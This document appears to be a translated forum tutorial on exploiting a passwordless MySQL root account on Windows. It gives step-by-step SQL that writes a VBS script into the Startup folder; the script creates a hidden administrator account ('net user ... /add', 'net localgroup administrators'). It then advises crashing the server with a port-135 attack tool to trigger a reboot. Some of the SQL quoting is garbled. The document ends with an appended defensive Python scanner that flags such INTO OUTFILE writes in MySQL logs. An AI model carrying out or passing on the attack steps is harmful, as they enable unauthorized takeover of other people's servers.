The day before yesterday I sent a post about the MySQL root user password. I also found some ways to use this vulnerability, generally by writing an ASP or PHP back door, which is not only troublesome but also requires guessing the website directory. If the other side doesn't run IIS, then is there nothing we can do?
Later I thought of a way, and I have succeeded on several machines I tested. Now I will announce it below:
1. Connect to the other party's MySQL server:
   mysql -u root -h 192.168.0.1
   mysql.exe is the program in the bin directory of the MySQL installation.
2. Let's see what databases there are:
   mysql> show databases;
   A default MySQL installation has two databases, mysql and test. If you see other databases, they are the user's own.
3. Enter the database:
   mysql> use test;
   We are now in the test database.
4. See what tables the database contains:
   mysql> show tables;
   By default there are no tables in test.
The following is the key part.
5. Create a new table in the test database:
   mysql> create table a (cmd text);
   OK, we have created a new table named a. The table has only one field, named cmd, of type text.
6. Insert content into the table:
   mysql> Insert Into a value ("" "wscript.shell =") ");
   mysql> Insert INTO a VALUES (" a = wshshell.run ("cmd.exe / c net user zjl317 zjl317 / add "", 0) ");
   mysql> INSERT INTO A VALUES (" b = wshshell.run ("cmd.exe / c net localgroup administrators zjl317 / add" ", 0)")
   Pay attention to the double quotation marks, the brackets and the trailing "0"! These three commands are what we use to build a VBS script.
7. Now let's look at what is in table a:
   mysql> select * from a;
   We will see three rows in the table, which is what we just entered. After confirming the input, move on to the next step.
8. Output the table as a VBS script file:
   mysql> select * from a into outfile "C://Docume~1//alluse~1//Start menu//Program//Start//a.vbs";
   This writes the contents of our table into the startup group as a VBS script file. Note the "/" symbol.
9. By now it should be clear: MySQL is simply being used to write out an executable file. Why VBS rather than a .bat? A batch file shows an obvious DOS window when it starts, whereas the VBS script hides the window completely and gives no error prompts.
Originally there should have been a complete script that deletes itself afterwards, but the Chinese directory names really cannot be handled, so this will have to do. OK, find a tool that attacks 135 to make the server restart, and a few minutes later you will be an administrator.
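A defender-side check for the technique described above, as an added example that is not from the original post: it scans MySQL general-query-log lines (a constructed sample is embedded) for INTO OUTFILE / INTO DUMPFILE writes and flags targets outside the server's secure_file_priv directory, script or executable extensions, and autostart folders. The log line layout, the allowed directory and the sample statements are assumptions for the example.

```python
import re
from pathlib import PureWindowsPath
from typing import Optional

# Constructed sample lines in MySQL general-query-log layout (not from the original post).
SAMPLE_LOG = """\
2024-01-01T10:00:03.000000Z\t 5 Query\tcreate table a (cmd text)
2024-01-01T10:00:04.000000Z\t 5 Query\tselect * from a into outfile "C:/Docume~1/alluse~1/Start Menu/Programs/Startup/a.vbs"
2024-01-01T10:00:05.000000Z\t 7 Query\tselect name from products into outfile '/var/lib/mysql-files/export.csv'
2024-01-01T10:00:06.000000Z\t 8 Query\tselect 1 into dumpfile '/var/www/html/x.php'
"""

LOG_LINE_RE = re.compile(r"^(?P<ts>\S+)\t\s*(?P<thread>\d+) Query\t(?P<sql>.*)$")
OUTFILE_RE = re.compile(r"\binto\s+(outfile|dumpfile)\s+(['\"])(.+?)\2", re.IGNORECASE)
SCRIPT_EXT = {".vbs", ".bat", ".cmd", ".exe", ".ps1", ".php", ".asp", ".aspx", ".jsp"}
AUTOSTART_HINTS = ("/startup/", "/start menu/", "/autostart/")


def classify_write(path: str, secure_file_priv: Optional[str]) -> list:
    """Reasons an INTO OUTFILE/DUMPFILE target is suspicious (empty list = benign)."""
    reasons = []
    low = path.replace("\\", "/").lower()
    if not secure_file_priv:  # empty/NULL secure_file_priv: the server allows writes anywhere
        reasons.append("secure_file_priv does not restrict file writes")
    elif not low.startswith(secure_file_priv.replace("\\", "/").lower().rstrip("/") + "/"):
        reasons.append("target outside secure_file_priv (server refuses it, but the attempt is logged)")
    suffix = PureWindowsPath(low).suffix  # PureWindowsPath parses both separator styles
    if suffix in SCRIPT_EXT:
        reasons.append(f"script/executable extension {suffix}")
    if any(h in low for h in AUTOSTART_HINTS):
        reasons.append("autostart location: the file would run at the next logon or boot")
    return reasons


def scan_general_log(log_text: str, secure_file_priv: Optional[str]) -> list:
    """One finding per flagged file-write statement found in general-log text."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE_RE.match(line)
        if not m:
            continue
        for keyword, _quote, path in OUTFILE_RE.findall(m["sql"]):
            reasons = classify_write(path, secure_file_priv)
            if reasons:
                findings.append({"thread": int(m["thread"]), "kind": keyword.lower(),
                                 "path": path, "reasons": reasons})
    return findings
```

Setting secure_file_priv to a dedicated directory (or disabling file writes entirely) makes the startup-folder write in the sample fail server-side; the scan still surfaces the attempt from the log.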
Author: lztei